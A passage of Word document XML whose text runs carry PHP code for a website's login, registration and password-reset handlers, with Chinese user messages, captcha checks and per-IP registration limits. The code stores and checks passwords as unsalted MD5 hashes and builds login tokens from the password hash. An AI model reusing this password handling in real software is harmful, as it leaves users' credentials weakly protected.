        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B2F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29D15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A230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268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56A0B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590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member['id'])-&gt;update(['update_time' =&gt; $time, 'update_ip' =&gt; $ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDF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 '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E10C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 = $member['id'] . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44979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_encrypt($data)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC9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55C2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ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28013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1BCE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E0F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1E6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user/reg </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户注册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1CF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用户注册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F31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697DB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68B30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username     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE3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password     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F93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de         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65216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520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g()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA1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BE2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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271B67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C1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0BF18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 = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D6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itle'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FB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 = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37373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 = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89E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FC0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nfig', $config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1842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16C55B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switch']['text'] || $config['switch']['text'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D5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D75E4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未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC3D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5AB758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C4D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00F7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amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05290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2D8D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用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230C3C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2773B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9A1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1240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instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4831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username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A19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input('password') ? input('password') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67D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C09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不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A984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659B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BBE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E66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510E52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D7BC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密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00202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C409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05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273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ma = input('yaoqingma') ? input('yaoqingma') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E2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code']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051751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ptcha = input('captcha') ? input('captcha') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B22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7FA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输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFC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051A4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10E3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F42A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_check($captcha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B049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942D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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580C9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58D092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92D6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4878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3B1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 = $mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524387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 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDC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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239823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bile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E986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nfig['regemail']['text'] == 1 &amp;&amp; _isEmail($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7C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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25709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email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD97C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nfig['reguser']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D0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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E681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ser'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A129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57C9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8CF1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格式不对，不可填写特殊字符，请重新填写账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB0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27369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6F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A7A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amp;&amp; !$user &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF3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BAE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未开放注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A1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60C9C0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F089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DAD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 $email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583410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code') ? input('code') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00200B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878A5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7778C3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验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4C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F6D6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526D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else if ($email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F354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A5B1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邮箱验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CEA6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2CDA2D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238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B054B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752CE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填写验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD24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7054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BF7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6E2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3F6B8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0EF2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username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787C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401DB8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F333D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data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9C2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6C084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1B2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C6B6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433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287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ban']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C2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n = "%**#" . $config['ban']['text'] . "%**#";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B6C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pos($ban, $username) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36500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6EB6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此账户系统不允许注册，请换其他账户注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000A5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284F18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6AED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177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02E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27FBF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p) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07733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9119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当前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存在异常，请检测网络或重新注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6F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3A2B7E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9A5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AA5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ip']['text'] != 0 || !$config['ip']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642E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sip['ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305287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sip['text'] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69173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sip['system'] = $_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DB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scount = Db::name('member_records')-&gt;where($recordsip)-&gt;whereTime('time', 'today')-&gt;order('id desc')-&gt;fetchSql(false)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D349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scount &gt; $config['ip']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD0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B1060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不要频繁注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46E1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40330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86C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9A3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FC953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where)-&gt;fetchSql(false)-&gt;field("id,password")-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995D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64362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input('post.token'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7A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ost.type');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DBF2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ppid &amp;&amp; $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F87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token = DB::name('member_band')-&gt;where(['type' =&gt; $type, 'uid' =&gt; $member['id']])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E912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password'] != md5($password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61156E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E4826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密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01039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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC16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E67D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C79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ppidtoken) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DC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uid'] = $member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31761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ype'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0FFC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code'] = $appid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259D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ime'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67C0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db = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5660B4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 $type . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB8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 . '|www.ffxiang.cn|' . md5($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E21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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA25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token' =&gt; $token]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1B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22F8B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445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已绑定过平台，请重新换号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3A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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D4A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A98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0842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0DBC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3067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已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04D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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631208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C9D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CFD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408F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password'] = md5($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D60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amp;&amp; $config['reguser']['text'] == 1) $map['user'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A239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amp;&amp; $config['regmobile']['text'] == 1) $map['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62991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amp;&amp; $config['regemail']['text'] == 1) $map['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC3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jingyan'] = $config['jingyan']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35355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audit']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69ED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 = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9E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F279D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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0E9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66E9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4F145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create_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF3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time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5E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ap['create_ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B5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ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5B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gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047A8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816A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yaoqingma) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F0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yaoqing($db, $yaoqingma);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A58F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7A4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db, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08708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input('post.token'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F857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ost.type');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB578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ppid &amp;&amp; $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED7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token = DB::name('member_band')-&gt;where(['type' =&gt; $type, 'uid' =&gt; $db])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4FB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ppidtoken) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E35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uid'] = $db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E4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ype'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B697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code'] = $appid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1E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ime'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA52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db = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C4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 $type . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB559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 . '|www.ffxiang.cn|' . $map['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38A5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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271ECE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token' =&gt; $token];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDE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38790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16F474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已绑定过平台，请重新换号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2028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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB39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8D8F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BE4A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2B6B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10B99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注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4A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CE2D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C49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C5B18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4DC88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注册失败，请检测</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214800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62480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D39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87F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8A4B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199ED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ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933F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979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8CEF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ssword()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAC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AE6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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC69C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576921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773BFD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name'] = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538358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onfig[$v['name']]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D654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content'] = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971A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v['name']]['text'] = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475460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F9D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assign('config', $config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBD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7F0B1B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switch']['text'] || $config['switch']['text'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B11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17F2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未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374CB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16482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8D01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7511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amp;&amp; !$config['regemail']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A1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D0DC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设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D45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6EC675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908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A2B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instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD9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username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA3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input('password') ? input('password') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E392B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257F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号码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414E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FF5F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4B8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F3D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388FE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8E1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输入设置密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52B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138A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C3C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D16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pwdcode']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034C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ptcha = input('captcha') ? input('captcha') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6D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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50205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C45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输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E9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2EC0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B9B7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5C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_check($captcha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2D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B750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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C0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52D05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DDC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828D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8A11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mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF8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regmobile']['text'] == 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167995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obile = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A8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bile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0E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nfig['regemail']['text'] == 1 &amp;&amp; _isEmail($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5392B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mail = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86E3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email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC105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0087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16BD5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格式不对，不可填写特殊字符，请重新填写账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7D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8FA12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B76D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FFC4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amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E97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EB77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未开放注册</w:t>
      </w:r>
